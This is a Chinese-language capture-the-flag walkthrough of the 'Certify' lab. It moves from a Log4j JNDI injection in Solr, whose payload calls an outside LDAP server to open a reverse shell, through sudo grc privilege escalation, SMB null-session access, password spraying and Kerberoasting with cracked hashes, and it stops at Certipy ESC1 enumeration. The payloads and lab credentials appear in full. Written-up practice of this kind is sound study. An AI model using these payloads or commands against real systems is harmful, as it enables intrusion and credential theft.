Certify
1. flag01
1.1. fscan扫描
┌──(root㉿kali)-[~/Desktop/ChunQiu/certify]
└─# fscan -h 39.99.134.81
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1
[1.0s] 已选择服务扫描模式
[1.0s] 开始信息扫描
[1.0s] 最终有效主机数量: 1
[1.0s] 开始主机扫描
[1.0s] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[1.0s] 有效端口数量: 233
[1.1s] [*] 端口开放 39.99.134.81:80
[1.1s] [*] 端口开放 39.99.134.81:22
[1.1s] [*] 端口开放 39.99.134.81:8983
[4.1s] 扫描完成, 发现 3 个开放端口
[4.1s] 存活端口数量: 3
[4.1s] 开始漏洞扫描
[4.1s] POC加载完成: 总共387个,成功387个,失败0个
[4.2s] [*] 网站标题 http://39.99.134.81 状态码:200 长度:612 标题:Welcome to nginx!
[4.7s] [*] 网站标题 http://39.99.134.81:8983 状态码:302 长度:0 标题:无标题 重定向地址: http://39.99.134.81:8983/solr/
[5.0s] [*] 网站标题 http://39.99.134.81:8983/solr/ 状态码:200 长度:16555 标题:Solr Admin
[14.7s] 扫描已完成: 5/5
1.2. log4j2 JNDI RCE
访问8983发现开启了solr用了log4j组件
http://39.101.140.92:8983/solr/admin/collections?action=${jndi:ldap://jrtcdopftt.iyhc.eu.org}
java环境安装:Linux Java版本控制
GitHub - zzwlpx/JNDIExploit: A malicious LDAP server for JNDI injection attacks
root@VM-12-4-ubuntu:~/tools# java -jar JNDIExploit-2.0-SNAPSHOT.jar -i 43.159.45.90
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8080...
[+] Received LDAP Query: Basic/ReverseShell/43.159.45.90/9999
[+] Payload: reverseshell
[+] IP: 43.159.45.90
[+] Port: 9999
[+] Sending LDAP ResourceRef result for Basic/ReverseShell/43.159.45.90/9999 with basic remote reference payload
[+] Send LDAP reference result for Basic/ReverseShell/43.159.45.90/9999 redirecting to http://43.159.45.90:8080/Exploit2SUpdh66Hk.class
[+] New HTTP Request From /39.99.225.156:50138 /Exploit2SUpdh66Hk.class
[+] Receive ClassRequest: Exploit2SUpdh66Hk.class
[+] Response Code: 200
弹shell
/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/9999}
1.3. sudo提权
solr@ubuntu:/opt/solr/server$ sudo -l
Matching Defaults entries for solr on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User solr may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/grc
solr@ubuntu:/opt/solr/server$ sudo grc --pty /bin/sh
# whoami
root
root@ubuntu:~/flag# cat flag01.txt
██████ ██ ██ ████
██░░░░██ ░██ ░░ ░██░ ██ ██
██ ░░ █████ ██████ ██████ ██ ██████ ░░██ ██
░██ ██░░░██░░██░░█░░░██░ ░██░░░██░ ░░███
░██ ░███████ ░██ ░ ░██ ░██ ░██ ░██
░░██ ██░██░░░░ ░██ ░██ ░██ ░██ ██
░░██████ ░░██████░███ ░░██ ░██ ░██ ██
░░░░░░ ░░░░░░ ░░░ ░░ ░░ ░░ ░░
Easy right?
Maybe you should dig into my core domain network.
flag01: flag{fec3a533-f2d0-4614-a211-6c470f5de530}
2. flag02
2.1. 内网扫描
root@ubuntu:~/flag# ./fscan -h 172.22.9.19/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1
[1.8s] 已选择服务扫描模式
[1.8s] 开始信息扫描
[1.8s] CIDR范围: 172.22.9.0-172.22.9.255
[1.8s] generate_ip_range_full
[1.8s] 解析CIDR 172.22.9.19/24 -> IP范围 172.22.9.0-172.22.9.255
[1.8s] 最终有效主机数量: 256
[1.8s] 开始主机扫描
[1.8s] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[1.8s] [*] 目标 172.22.9.19 存活 (ICMP)
[1.8s] [*] 目标 172.22.9.26 存活 (ICMP)
[1.8s] [*] 目标 172.22.9.47 存活 (ICMP)
[1.8s] [*] 目标 172.22.9.7 存活 (ICMP)
[4.8s] 存活主机数量: 4
[4.8s] 有效端口数量: 233
[4.9s] [*] 端口开放 172.22.9.47:445
[4.9s] [*] 端口开放 172.22.9.47:139
[4.9s] [*] 端口开放 172.22.9.19:22
[4.9s] [*] 端口开放 172.22.9.19:80
[4.9s] [*] 端口开放 172.22.9.47:80
[4.9s] [*] 端口开放 172.22.9.47:22
[4.9s] [*] 端口开放 172.22.9.47:21
[4.9s] [*] 端口开放 172.22.9.26:445
[4.9s] [*] 端口开放 172.22.9.26:139
[4.9s] [*] 端口开放 172.22.9.26:135
[4.9s] [*] 端口开放 172.22.9.19:8983
[4.9s] [*] 端口开放 172.22.9.7:389
[4.9s] [*] 端口开放 172.22.9.7:445
[4.9s] [*] 端口开放 172.22.9.7:139
[4.9s] [*] 端口开放 172.22.9.7:135
[4.9s] [*] 端口开放 172.22.9.7:88
[4.9s] [*] 端口开放 172.22.9.7:80
[7.9s] 扫描完成, 发现 17 个开放端口
[7.9s] 存活端口数量: 17
[7.9s] 开始漏洞扫描
[8.0s] [*] NetInfo 扫描结果
目标主机: 172.22.9.7
主机名: XIAORANG-DC
发现的网络接口:
IPv4地址:
└─ 172.22.9.7
[8.0s] [*] NetInfo 扫描结果
目标主机: 172.22.9.26
主机名: DESKTOP-CBKTVMO
发现的网络接口:
IPv4地址:
└─ 172.22.9.26
[8.0s] [*] 网站标题 http://172.22.9.19 状态码:200 长度:612 标题:Welcome to nginx!
[8.0s] [*] 网站标题 http://172.22.9.47 状态码:200 长度:10918 标题:Apache2 Ubuntu Default Page: It works
[8.0s] [+] NetBios 172.22.9.47 fileserver Windows 6.1
[8.0s] [+] SMB认证成功 172.22.9.47:445 administrator:admin
[8.0s] [+] NetBios 172.22.9.26 DESKTOP-CBKTVMO.xiaorang.lab Windows Server 2016 Datacenter 14393
[8.0s] [+] NetBios 172.22.9.7 DC:XIAORANG\XIAORANG-DC
[8.1s] 系统信息 172.22.9.47 [Windows 6.1]
[8.1s] POC加载完成: 总共387个,成功387个,失败0个
[8.2s] [*] 网站标题 http://172.22.9.7 状态码:200 长度:703 标题:IIS Windows Server
[8.2s] [*] 网站标题 http://172.22.9.19:8983 状态码:302 长度:0 标题:无标题 重定向地址: http://172.22.9.19:8983/solr/
[8.4s] SMB2共享信息 172.22.9.47:445 administrator Pass: 共享:[print$ fileshare IPC$]
[8.5s] SMB2共享信息 172.22.9.47:445 administrator Pass:admin 共享:[print$ fileshare IPC$]
[8.5s] SMB2共享信息 172.22.9.47:445 administrator Pass:root 共享:[print$ fileshare IPC$]
[8.5s] SMB2共享信息 172.22.9.47:445 administrator Pass:admin123 共享:[print$ fileshare IPC$]
[8.5s] SMB2共享信息 172.22.9.47:445 administrator Pass:123456 共享:[print$ fileshare IPC$]
[8.5s] SMB2共享信息 172.22.9.47:445 administrator Pass:P@ssword123 共享:[print$ fileshare IPC$]
[8.5s] SMB2共享信息 172.22.9.47:445 administrator Pass:password 共享:[print$ fileshare IPC$]
[8.5s] SMB2共享信息 172.22.9.47:445 administrator Pass:pass@123 共享:[print$ fileshare IPC$]
[8.5s] SMB2共享信息 172.22.9.47:445 administrator Pass:Password 共享:[print$ fileshare IPC$]
[8.5s] SMB2共享信息 172.22.9.47:445 administrator Pass:pass123 共享:[print$ fileshare IPC$]
[9.0s] [*] 网站标题 http://172.22.9.19:8983/solr/ 状态码:200 长度:16555 标题:Solr Admin
172.22.9.7 DC:XIAORANG\XIAORANG-DC
172.22.9.19 solr log4j2
172.22.9.26 DESKTOP-CBKTVMO.xiaorang.lab
172.22.9.47 fileserver SMB匿名会话
2.2. 代理搭建
./stowaway_agent -l 7788 #服务端
./stowaway_agent -c 43.159.45.90:7788 #客户端连接
2.3. SMB空会话
配置 etc/hosts
┌──(root㉿kali)-[~/Desktop/ChunQiu/certify]
└─# proxychains -q nxc smb 172.22.9.7 -u guest -p '' --generate-hosts-file hosts
SMB 172.22.9.7 445 XIAORANG-DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:XIAORANG-DC) (domain:xiaorang.lab) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.22.9.7 445 XIAORANG-DC [-] xiaorang.lab\guest: STATUS_ACCOUNT_DISABLED
┌──(root㉿kali)-[~/Desktop/ChunQiu/certify]
└─# cat hosts
172.22.9.7 XIAORANG-DC.xiaorang.lab xiaorang.lab XIAORANG-DC
查看共享
┌──(root㉿kali)-[~/Desktop/ChunQiu/certify]
└─# proxychains -q nxc smb 172.22.9.47 -u guest -p '' --shares
SMB 172.22.9.47 445 FILESERVER [*] Unix - Samba (name:FILESERVER) (domain:) (signing:False) (SMBv1:True) (Null Auth:True)
SMB 172.22.9.47 445 FILESERVER [+] \guest: (Guest)
SMB 172.22.9.47 445 FILESERVER [*] Enumerated shares
SMB 172.22.9.47 445 FILESERVER Share Permissions Remark
SMB 172.22.9.47 445 FILESERVER ----- ----------- ------
SMB 172.22.9.47 445 FILESERVER print$ Printer Drivers
SMB 172.22.9.47 445 FILESERVER fileshare READ,WRITE bill share
SMB 172.22.9.47 445 FILESERVER IPC$ IPC Service (fileserver server (Samba, Ubuntu))
smbclient 连接fileshare共享
┌──(root㉿kali)-[~/Desktop/ChunQiu/certify]
└─# proxychains -q smbclient //172.22.9.47/fileshare
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 6 10:19:56 2025
.. D 0 Wed Jul 13 00:35:09 2022
personnel.db A 61440 Wed Jul 13 03:46:55 2022
secret D 0 Thu Nov 6 08:57:59 2025
Certified_Pre-Owned.7z N 9572925 Wed Jul 13 04:12:03 2022
Certified_Pre-Owned.pdf N 10406101 Wed Jul 13 04:08:14 2022
dCSjzXhRpm D 0 Thu Nov 6 10:15:51 2025
41152812 blocks of size 1024. 36063772 blocks available
smb: \> get personnel.db
getting file \personnel.db of size 61440 as personnel.db (27.2 KiloBytes/sec) (average 27.2 KiloBytes/sec)
smb: \> cd secret
smb: \secret\> ls
. D 0 Thu Nov 6 08:57:59 2025
.. D 0 Thu Nov 6 10:19:56 2025
flag02.txt N 659 Thu Nov 6 08:57:59 2025
41152812 blocks of size 1024. 36063740 blocks available
smb: \secret\> get flag02.txt
getting file \secret\flag02.txt of size 659 as flag02.txt (0.3 KiloBytes/sec) (average 14.8 KiloBytes/sec)
smb: \secret\> exit
┌──(root㉿kali)-[~/Desktop/ChunQiu/certify]
└─# cat flag02.txt
________ _______ ________ _________ ___ ________ ___ ___
|\ ____\|\ ___ \ |\ __ \|\___ ___\\ \|\ _____\\ \ / /|
\ \ \___|\ \ __/|\ \ \|\ \|___ \ \_\ \ \ \ \__/\ \ \/ / /
\ \ \ \ \ \_|/_\ \ _ _\ \ \ \ \ \ \ \ __\\ \ / /
\ \ \____\ \ \_|\ \ \ \\ \| \ \ \ \ \ \ \ \_| \/ / /
\ \_______\ \_______\ \__\\ _\ \ \__\ \ \__\ \__\__/ / /
\|_______|\|_______|\|__|\|__| \|__| \|__|\|__|\___/ /
\|___|/
flag02: flag{b013a137-770b-4797-ba16-c8cf431dab4a}
Yes, you have enumerated smb. But do you know what an SPN is?
3. flag03
下载一下这个db文件
密码
用户名
3.1. 密码喷涂
┌──(root㉿kali)-[~/Desktop/ChunQiu/certify]
└─# proxychains -q nxc smb 172.22.9.26 -u valid_users -p passwords.txt
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [*] Windows Server 2016 Datacenter 14393 x64 (name:DESKTOP-CBKTVMO) (domain:xiaorang.lab) (signing:False) (SMBv1:True)
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\huangmin:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangrong:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liying:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhaoli:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangyan:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhoujing:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liuying:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wanghao:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangqiang:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wanglu:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhaoyong:admin STATUS_LOGON_FAILURE
<SNIP>
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangjian:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [+] xiaorang.lab\zhangjian:i9XDE02pLVf
xiaorang.lab\zhangjian:i9XDE02pLVf
3.2. Kerberoasting
┌──(root㉿kali)-[~]
└─# proxychains -q impacket-GetUserSPNs -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVproxychains -q impacket-GetUserSPNs -request -dc-ip 172.22.9.7
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------------------- -------- -------- -------------------------- --------- ----------
TERMSERV/desktop-cbktvmo.xiaorang.lab zhangxia 2023-07-14 00:45:45.213944 <never>
WWW/desktop-cbktvmo.xiaorang.lab/IIS zhangxia 2023-07-14 00:45:45.213944 <never>
TERMSERV/win2016.xiaorang.lab chenchen 2023-07-14 00:45:39.767035 <never>
[-] CCache file is not found. Skipping...
$krb5tgs$23$*zhangxia$XIAORANG.LAB$xiaorang.lab/zhangxia*$88386e891b47441e6856dbab73264dc2$b3ce49500fba721eaaaee53e084af3a4e2e008a7937068a182979c03056cd0aef41862e27460d54c2153f941d014641b606550f12dbf01b357e7db39b0805228416d6df105ba37dbef05cab2cbeb2846c9a9328ec7f2098b574b58a5a621866062f74b3c66340e50b9f5b1696fd69de5582f8212dec77e688553b99e3985ddce3d1d962e6316fc46dbd6426564a7f7de74ac81b85a2cbdc483a292159d49e3c30ca70338d326ec1dd77a6fc791b60b3227c3a9699fe87f2c7933528faa1af43aeda8729a5a32b166e2ec50ecea9f72697ad6b0f9ad744e01487aa7f06c03bd57292257d3f9692c8c11b53e4aee273e6f6dbb077d7059540fda277a320bbb1fef09323c970cea5799eac7fb1fde95b9cb801c68b4421da1c2e336a2cfda6172cfad26265d48e6f5770df48772fb0b2e665f5db19a0dabe490dead495d02013b9e9a5d900e8db0c0358c7759edd81871bf6562a7d96274944c03ba8964591abc7bced2aeb42ad41f2e1ac0ba0988372d8790f139fa2c86994925a6aafa08733a53995f93f3feb7a0ae1a599c32f6626a53ad02d31c8253ba85afcaee786a14e1382d669affe94828f0779cc6099146be1a943154479d7cfb47ebfa4f4ccfab7137cd9cef3b56c35572755fa94e2be92cbf615b0d8bd2bbb7a2c7b326fb92e3c98eb4c383fa11db4a7e44e9fc40effb057df0a84c29607fa760e0798a243607cbbd02c902fd2c4c1df355a04f0adc6dd942e522e4f8687236187c56bce4465c1695f466613599ab54e40e0e276884f17bf0ed25991b9b3d46ea08f0833635c2ade111b6dea419b1c47384cfb1f8096121e3215dd2ee4ad12e1a7a5f49f71a277fba43a55a81fa14326a77393da4b05dbf47da1c9ffc993a972d083e876e9be8161f08f0ebad1ffefd3e96c323a156ae1d276efbf4e9ec27b355b05c1218077396293403954bd041043ee4bd6db12021a0940a5d2eb99eba3d8318d9b9d668117493ae90fe7f537f377324b9602f7849a86906aa0ced789c7e7b34ad72b207c277bdd997bfcf9151911ae46990118880c702c48484bc01bb2d97e78ed3b869c2207d75660150b98891ef90f8bf4f64e0c4ccc3140f592e03b06da75b62c6b27f456fd766e27ff578cfa6bb5a32e867b09843c505e2b05f1acfb17ebd3dc16533a70f22b9d77b423fad25d2d60df5f67cd57180b9e98e27a571ad030c9eeab5fef30dfe251a95d32fc0b65979e677539ea00b26ba9a65fd8b35d422d74339d376fb29f1fabf43f318a6435e2f938a48fb959302c4a5ca6338fd109af82345213dc22464978067d2eb86088b05b4fe28a8bec6a4dc41962a3a29a08846237de3d4482f11bafdb2fa772c8fa89f669c2710d406b01171ffe2f55ced22f22941da2130b5aa80f2951d6c43fcc17dfc80b827db337e44375da128dc9ce0ce323016a568d0ee38e86d676d6842d4982ecbbdaec944adad39e3ac62041bb464f7f252abf4c1b93c8e79954d35c4ec85bd1a3643
$krb5tgs$23$*chenchen$XIAORANG.LAB$xiaorang.lab/chenchen*$c4ea79ab1d180405affcbf36e858e11d$079a507970b90efcbde5d807c6f4c4e65b643d447474d693162ef9f9a51f69b2d00185d399ad4467bb1794bc46e957f828dff944b5130e98949c1ade6b3617f99ccea5c889a61ea07b51ff47c81d3445de78b0c3f1cf6b0ab87ef4dbd36dcde45882906ab904e791d0a237ccd1e56f228345c8da990ab8195c9f22d658621ffcf7cdbf78acd580b37010328eb12a462730b907b85cfb4978c6f50e8577592ba5b9d5e3bfa8406243371516e362fd37ceffa21926a4a72e56af70c6a753dd3b5fdfdb7a25172eb9b2163c3934f8b976dfd5e0c7082d97ff0d85b4c3b81e53721cc42924194c2c56f45191fdd9c55c1e4128d7ab65aa5799d4b927ef4e4c894b2140b1af059b0366a9c80f7c29e035b1b53a34c1ec1a7582aaf779bcf92ce62626077c3edf51eea970449a50ec1fa316d25d59c2fdbefe21b503b7ba13312f9db4fee8d46ebfaff673d70fc6d8e895dfb45e203975178780082480cb7f4ef08e6d6b64a8722861e0654cfb489cef03822d9821fd2f9cb230fe11e8b5aabfc22e4f3c2f8cb1e93a7125691d5dfeb07ca3dbf63fb2a63b45ca76f455f1b1a5290b39b6383a81cc51ac44d06a98b9ab55da4e63cbfda0b5cdf3b01355458be5b6046332ac086ae0f3a04f0389e17e38e682bb3814506f720373f44edc70629556f82607f71d3b593f0db51e6b246ff9cf15d02375f58c5108bd4476dab50580086d56ba8e7e06828c97c35d3af91ff59dd55ac9430b070994897b1da561660facc2194c34406c12e79ba1212c3bca5417de6e497ba7f91bcd196d8d5eeaccd13d013dfb4bd55a6a6f47b496f11f20eede4f2611bcf838d27580da41a527f9ebb7343f99a361574398035fea697db3ac9f93501b6e00f4a2ca454c17c03a7540b69deb382f48040bc016b679290810d3758670b36ee960754efe8fe0f10e54e8c50516bbd08e6e29fa5bb8b8908af3a2440d2469a341db19011fafe8aa86850beb09536be591523e0f91379283f06696d3ca836aec0731bf311b923af6427e34a6adf2ca2f1e60d759e7d38e966ff3e435c06f429da7af74b8af3efffe8e9f146cb71d8e10745a0202368c5b76f2c9485d7a3c0b685ac6dd1a3940e49e08b7b820e6e58b506c0a3ddde8a9ecffd8f348345d44cad5d9da1eab5ce7342360e958adfff235be28f6c2df6356bd0df5ef1b1c8476b8d296d258b58b584c30b52cb869c46cf560097caef053f1ed8cc094619e93cfbc5102863313488d44858df002f8a666ba5a64cb45b50ec5f4147c7abbc51f82319514fc03cd5ba16eb53398243044a1f0fe30840ad31c31ca5e17913224fe526f1c37d87c3f2a46b09123a33c9c16e52685ad4f55065693f9ad69e535db086f6426bf40444ea1fadb9819b974b9734722fb4342bb9477464f7706329feeb89b250cf0610bf2fd0d8b9d7035783f50ba31626bf760174ae289c3f710728ea94a61b3187695d5e8597bc26c2607641a5595dd7500721a1fbcf2833863abf7
使用 hashcat 破解
hashcat.exe -m 13100 hash.txt rockyou.txt
$krb5tgs$23$*chenchen$XIAORANG.LAB$xiaorang.lab/chenchen*$c4ea79ab1d180405affcbf36e858e11d$079a507970b90efcbde5d807c6f4c4e65b643d447474d693162ef9f9a51f69b2d00185d399ad4467bb1794bc46e957f828dff944b5130e98949c1ade6b3617f99ccea5c889a61ea07b51ff47c81d3445de78b0c3f1cf6b0ab87ef4dbd36dcde45882906ab904e791d0a237ccd1e56f228345c8da990ab8195c9f22d658621ffcf7cdbf78acd580b37010328eb12a462730b907b85cfb4978c6f50e8577592ba5b9d5e3bfa8406243371516e362fd37ceffa21926a4a72e56af70c6a753dd3b5fdfdb7a25172eb9b2163c3934f8b976dfd5e0c7082d97ff0d85b4c3b81e53721cc42924194c2c56f45191fdd9c55c1e4128d7ab65aa5799d4b927ef4e4c894b2140b1af059b0366a9c80f7c29e035b1b53a34c1ec1a7582aaf779bcf92ce62626077c3edf51eea970449a50ec1fa316d25d59c2fdbefe21b503b7ba13312f9db4fee8d46ebfaff673d70fc6d8e895dfb45e203975178780082480cb7f4ef08e6d6b64a8722861e0654cfb489cef03822d9821fd2f9cb230fe11e8b5aabfc22e4f3c2f8cb1e93a7125691d5dfeb07ca3dbf63fb2a63b45ca76f455f1b1a5290b39b6383a81cc51ac44d06a98b9ab55da4e63cbfda0b5cdf3b01355458be5b6046332ac086ae0f3a04f0389e17e38e682bb3814506f720373f44edc70629556f82607f71d3b593f0db51e6b246ff9cf15d02375f58c5108bd4476dab50580086d56ba8e7e06828c97c35d3af91ff59dd55ac9430b070994897b1da561660facc2194c34406c12e79ba1212c3bca5417de6e497ba7f91bcd196d8d5eeaccd13d013dfb4bd55a6a6f47b496f11f20eede4f2611bcf838d27580da41a527f9ebb7343f99a361574398035fea697db3ac9f93501b6e00f4a2ca454c17c03a7540b69deb382f48040bc016b679290810d3758670b36ee960754efe8fe0f10e54e8c50516bbd08e6e29fa5bb8b8908af3a2440d2469a341db19011fafe8aa86850beb09536be591523e0f91379283f06696d3ca836aec0731bf311b923af6427e34a6adf2ca2f1e60d759e7d38e966ff3e435c06f429da7af74b8af3efffe8e9f146cb71d8e10745a0202368c5b76f2c9485d7a3c0b685ac6dd1a3940e49e08b7b820e6e58b506c0a3ddde8a9ecffd8f348345d44cad5d9da1eab5ce7342360e958adfff235be28f6c2df6356bd0df5ef1b1c8476b8d296d258b58b584c30b52cb869c46cf560097caef053f1ed8cc094619e93cfbc5102863313488d44858df002f8a666ba5a64cb45b50ec5f4147c7abbc51f82319514fc03cd5ba16eb53398243044a1f0fe30840ad31c31ca5e17913224fe526f1c37d87c3f2a46b09123a33c9c16e52685ad4f55065693f9ad69e535db086f6426bf40444ea1fadb9819b974b9734722fb4342bb9477464f7706329feeb89b250cf0610bf2fd0d8b9d7035783f50ba31626bf760174ae289c3f710728ea94a61b3187695d5e8597bc26c2607641a5595dd7500721a1fbcf2833863abf7:@Passw0rd@
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*chenchen$XIAORANG.LAB$xiaorang.lab/che...63abf7
Time.Started.....: Fri Nov 07 00:03:10 2025 (1 sec)
Time.Estimated...: Fri Nov 07 00:03:11 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 16586.1 kH/s (6.06ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 11796480/14344388 (82.24%)
Rejected.........: 0/11796480 (0.00%)
Restore.Point....: 11010048/14344388 (76.76%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: Joyve31 -> 8205385
Hardware.Mon.#01.: Temp: 53c Util: 26% Core:1890MHz Mem:8001MHz Bus:8
$krb5tgs$23$*zhangxia$XIAORANG.LAB$xiaorang.lab/zhangxia*$88386e891b47441e6856dbab73264dc2$b3ce49500fba721eaaaee53e084af3a4e2e008a7937068a182979c03056cd0aef41862e27460d54c2153f941d014641b606550f12dbf01b357e7db39b0805228416d6df105ba37dbef05cab2cbeb2846c9a9328ec7f2098b574b58a5a621866062f74b3c66340e50b9f5b1696fd69de5582f8212dec77e688553b99e3985ddce3d1d962e6316fc46dbd6426564a7f7de74ac81b85a2cbdc483a292159d49e3c30ca70338d326ec1dd77a6fc791b60b3227c3a9699fe87f2c7933528faa1af43aeda8729a5a32b166e2ec50ecea9f72697ad6b0f9ad744e01487aa7f06c03bd57292257d3f9692c8c11b53e4aee273e6f6dbb077d7059540fda277a320bbb1fef09323c970cea5799eac7fb1fde95b9cb801c68b4421da1c2e336a2cfda6172cfad26265d48e6f5770df48772fb0b2e665f5db19a0dabe490dead495d02013b9e9a5d900e8db0c0358c7759edd81871bf6562a7d96274944c03ba8964591abc7bced2aeb42ad41f2e1ac0ba0988372d8790f139fa2c86994925a6aafa08733a53995f93f3feb7a0ae1a599c32f6626a53ad02d31c8253ba85afcaee786a14e1382d669affe94828f0779cc6099146be1a943154479d7cfb47ebfa4f4ccfab7137cd9cef3b56c35572755fa94e2be92cbf615b0d8bd2bbb7a2c7b326fb92e3c98eb4c383fa11db4a7e44e9fc40effb057df0a84c29607fa760e0798a243607cbbd02c902fd2c4c1df355a04f0adc6dd942e522e4f8687236187c56bce4465c1695f466613599ab54e40e0e276884f17bf0ed25991b9b3d46ea08f0833635c2ade111b6dea419b1c47384cfb1f8096121e3215dd2ee4ad12e1a7a5f49f71a277fba43a55a81fa14326a77393da4b05dbf47da1c9ffc993a972d083e876e9be8161f08f0ebad1ffefd3e96c323a156ae1d276efbf4e9ec27b355b05c1218077396293403954bd041043ee4bd6db12021a0940a5d2eb99eba3d8318d9b9d668117493ae90fe7f537f377324b9602f7849a86906aa0ced789c7e7b34ad72b207c277bdd997bfcf9151911ae46990118880c702c48484bc01bb2d97e78ed3b869c2207d75660150b98891ef90f8bf4f64e0c4ccc3140f592e03b06da75b62c6b27f456fd766e27ff578cfa6bb5a32e867b09843c505e2b05f1acfb17ebd3dc16533a70f22b9d77b423fad25d2d60df5f67cd57180b9e98e27a571ad030c9eeab5fef30dfe251a95d32fc0b65979e677539ea00b26ba9a65fd8b35d422d74339d376fb29f1fabf43f318a6435e2f938a48fb959302c4a5ca6338fd109af82345213dc22464978067d2eb86088b05b4fe28a8bec6a4dc41962a3a29a08846237de3d4482f11bafdb2fa772c8fa89f669c2710d406b01171ffe2f55ced22f22941da2130b5aa80f2951d6c43fcc17dfc80b827db337e44375da128dc9ce0ce323016a568d0ee38e86d676d6842d4982ecbbdaec944adad39e3ac62041bb464f7f252abf4c1b93c8e79954d35c4ec85bd1a3643:MyPass2@@6
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*zhangxia$XIAORANG.LAB$xiaorang.lab/zha...1a3643
Time.Started.....: Fri Nov 07 00:04:06 2025 (0 secs)
Time.Estimated...: Fri Nov 07 00:04:06 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 16690.0 kH/s (6.54ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 11010048/14344388 (76.76%)
Rejected.........: 0/11010048 (0.00%)
Restore.Point....: 10223616/14344388 (71.27%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: alisonpanda -> Joywang328
Hardware.Mon.#01.: Temp: 52c Util: 33% Core:1890MHz Mem:8001MHz Bus:8
172.22.9.26
xiaorang.lab\zhangxia MyPass2@@6
xiaorang.lab\chenchen @Passw0rd@
这两个都可以登录,但还需要提权
3.3. ESC1
┌──(root㉿kali)-[~]
└─# proxychains -q certipy find -u 'chenchen@xiaorang.lab' -p '@Passw0rd@' -dc-ip '172.22.9.7' -vulnerable -stdout
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 35 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[!] DNS resolution failed: The resolution lifetime expired after 5.403 seconds: Server Do53:172.22.9.7@53 answered The DNS operation timed out.; Server Do53:172.22.9.7@53 answered The DNS operation timed out.; Server Do53:172.22.9.7@53 answered The DNS operation timed out.
[!] Use -debug to print a stacktrace
[*] Retrieving CA configuration for 'xiaorang-XIAORANG-DC-CA' via RRP
